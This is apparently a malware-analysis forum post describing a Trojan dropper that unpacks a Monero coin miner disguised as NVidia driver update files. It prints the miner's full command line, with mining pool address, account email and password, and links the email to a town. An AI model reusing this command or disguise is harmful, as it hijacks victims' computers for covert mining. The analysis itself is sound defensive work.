A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32408  by EP_X0FF
 Wed Jan 09, 2019 9:38 am
ikolor wrote: Sun Jan 01, 2017 1:18 pm Please make selection ...2017

https://www.virustotal.com/en/file/ca2e ... 483276621/
Trojan muldrop with coin miner as payload.

SFX archive, next actual malware dropper -> extracts files to %UserProfile%\Public. Main malware inside password protected zip file called dokinz.zip. This zip file unpacked by ConsoleApplication1.exe (also dropped by malware) with password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking ConsoleApplication1.exe executes malicious script NVidiaDriverUpdate.vbs

TL;DR it is cryptocurrency miner configured as
Code: Select all
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, true
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".

This email can be found in google and lead to russian Magnitogorsk.

Posts moved.